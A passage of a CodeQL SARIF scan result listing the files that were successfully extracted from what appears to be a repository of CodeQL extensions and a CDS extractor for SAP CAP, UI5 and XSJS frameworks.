:"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml","uriBaseId":"%SRCROOT%","index":14}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":15}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":16}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/frameworks/xsjs/ext/ext/xsjs.model.yml","uriBaseId":"%SRCROOT%","index":17}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml","uriBaseId":"%SRCROOT%","index":18}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":19}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":20}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"cds-extractor-marker.js","uriBaseId":"%SRCROOT%","index":26}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"codeql-workspace.yml","uriBaseId":"%SRCROOT%","index":27}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/codeql-extractor.yml","uriBaseId":"%SRCROOT%","index":28}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/.prettierrc.js","uriBaseId":"%SRCROOT%","index":29}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/package-lock.json","uriBaseId":"%SRCROOT%","index":35}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/package.json","uriBaseId":"%SRCROOT%","index":36}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":88}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":89}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/tsconfig.json","uriBaseId":"%SRCROOT%","index":95}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":97}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":98}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":99}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":100}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":101}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":102}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":103}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":104}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":105}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-